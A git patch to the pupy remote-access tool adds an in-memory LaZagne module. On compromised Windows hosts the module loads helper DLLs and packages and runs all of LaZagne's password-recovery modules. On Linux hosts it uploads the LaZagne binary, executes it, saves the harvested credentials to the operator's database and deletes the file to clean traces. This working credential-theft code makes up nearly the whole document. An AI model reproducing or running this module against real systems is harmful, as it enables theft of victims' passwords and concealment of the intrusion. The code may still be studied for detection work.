From f0e60a7606f28e347b43faf7a1492111662ff4b0 Mon Sep 17 00:00:00 2001 From: n1nj4sec Date: Wed, 24 Aug 2016 19:30:02 +0200 Subject: [PATCH] In-memory LaZagne module from AlessandroZ --- .gitmodules | 4 ++ pupy/external/impacket | 1 + pupy/modules/lazagne.py | 121 ++++++++++++++++++++++++++++------------ 3 files changed, 89 insertions(+), 37 deletions(-) create mode 160000 pupy/external/impacket diff --git a/.gitmodules b/.gitmodules index 632dc762..c498a279 100644 --- a/.gitmodules +++ b/.gitmodules @@ -10,3 +10,7 @@ path = pupy/external/LaZagne url = https://github.com/AlessandroZ/LaZagne shallow = true +[submodule "pupy/external/impacket"] + path = pupy/external/impacket + url = https://github.com/CoreSecurity/impacket + shallow = true diff --git a/pupy/external/impacket b/pupy/external/impacket new file mode 160000 index 00000000..8af9271f --- /dev/null +++ b/pupy/external/impacket @@ -0,0 +1 @@ +Subproject commit 8af9271f656b6d420466f8bcaec8b81253388340 diff --git a/pupy/modules/lazagne.py b/pupy/modules/lazagne.py index 6760054b..e6476948 100644 --- a/pupy/modules/lazagne.py +++ b/pupy/modules/lazagne.py @@ -1,4 +1,6 @@ # -*- coding: UTF8 -*- +# Author: AlessandroZ + from pupylib.PupyModule import * from pupylib.PupyCompleter import * from rpyc.utils.classic import upload @@ -6,6 +8,7 @@ from pupylib.utils.credentials import Credentials import tempfile import subprocess import os.path +from pupylib.utils.rpyc_utils import redirected_stdo __class_name__="LaZagne" @@ -16,56 +19,100 @@ class LaZagne(PupyModule): """ def init_argparse(self): self.arg_parser = PupyArgumentParser(prog="lazagne", description=self.__doc__) + self.arg_parser.add_argument("-v", "--verbose", action='store_true') def run(self, args): platform=self.client.desc["platform"] - isWindows = True if "Windows" in platform: - lazagne_path = self.client.pupsrv.config.get("lazagne","win") + if "64" in self.client.desc["proc_arch"]: + self.error('Not yet implemented for a x64 bits process, migrate to a 32 bits process and try again ! \nEx: run migrate -c \'C:\\Windows\\SysWOW64\\notepad.exe\'') + return + + # load all dependency + self.client.load_dll(os.path.abspath(os.path.join(os.path.dirname(__file__),"..", "packages", "windows", "x86", "sqlite3.dll"))) + self.client.load_package("sqlite3") + self.client.load_package("_sqlite3") + self.client.load_package("xml") + self.client.load_package("_elementtree") + self.client.load_package("pyexpat") # needed for _elementtree module + self.client.load_package("win32crypt") + self.client.load_package("win32api") + self.client.load_package("win32con") + self.client.load_package("win32cred") + self.client.load_package("colorama") + self.client.load_package("impacket") + self.client.load_package("calendar") + self.client.load_package("win32security") + self.client.load_package("win32net") + self.client.load_package("lazagne") + + db = Credentials() + + moduleNames = self.client.conn.modules["lazagne.config.manageModules"].get_modules() + for module in moduleNames: + if args.verbose: + self.info("running module %s"%(str(module).split(' ',1)[0].strip('<'))) + passwords = module.run(module.options['dest'].capitalize()) + self.print_results(module.options['dest'].capitalize(), passwords, db) + elif "Linux" in platform: isWindows = False if "64" in self.client.desc["os_arch"]: lazagne_path = self.client.pupsrv.config.get("lazagne","linux_64") else: lazagne_path = self.client.pupsrv.config.get("lazagne","linux_32") - else: - self.error("Platform not supported") - return + + if not os.path.isfile(lazagne_path): + self.error("laZagne exe %s not found ! please edit laZagne section in pupy.conf"%lazagne_path) + self.error('Find releases on github: https://github.com/AlessandroZ/LaZagne/releases') + return + + tf = tempfile.NamedTemporaryFile() + dst = tf.name + tf.file.close() - if not os.path.isfile(lazagne_path): - self.error("laZagne exe %s not found ! please edit laZagne section in pupy.conf"%lazagne_path) - self.error('Find releases on github: https://github.com/AlessandroZ/LaZagne/releases') - return - - tf = tempfile.NamedTemporaryFile() - dst = tf.name - if isWindows: - remoteTempFolder = self.client.conn.modules['os.path'].expandvars("%TEMP%") - tfName = tf.name.split(os.sep) - tfName = tfName[len(tfName)-1] + '.exe' - dst = self.client.conn.modules['os.path'].join(remoteTempFolder, tfName) - tf.file.close() - - self.success("Uploading laZagne to: %s" % dst) - upload(self.client.conn, lazagne_path, dst) - - if not isWindows: + self.success("Uploading laZagne to: %s" % dst) + upload(self.client.conn, lazagne_path, dst) + self.success("Adding execution permission") cmd = ["chmod", "+x", dst] output = self.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE) - self.success("Executing") - cmd = [dst, "all"] - output = self.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE) - self.success("%s" % output) - - creds = self.parse_output(output) - db = Credentials() - db.add(creds) - self.success("Passwords stored on the database") - - self.success("Cleaning traces") - self.client.conn.modules['os'].remove(dst) + self.success("Executing") + cmd = [dst, "all"] + output = self.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE) + self.success("%s" % output) + + creds = self.parse_output(output) + db = Credentials() + db.add(creds) + self.success("Passwords stored on the database") + + self.success("Cleaning traces") + self.client.conn.modules['os'].remove(dst) + + else: + self.error("Platform not supported") + return + + def print_results(self, module, creds, db): + if creds: + print "\n############## %s passwords ##############\n" % module + clean_creds = [] + for cred in creds: + clean_cred = {} + clean_cred['Tool'] = 'Lazagne' + for c in cred.keys(): + clean_cred[c] = cred[c].encode('utf-8') + print "%s: %s" % (c, cred[c]) + print + clean_creds.append(clean_cred) + + try: + db.add(clean_creds) + self.success("Passwords stored on the database") + except Exception, e: + print e def parse_output(self, output): creds = [] @@ -110,5 +157,5 @@ class LaZagne(PupyModule): key, value = line.split(':', 1) cred[key] = value.strip() except: - pass - return creds \ No newline at end of file + pass + return creds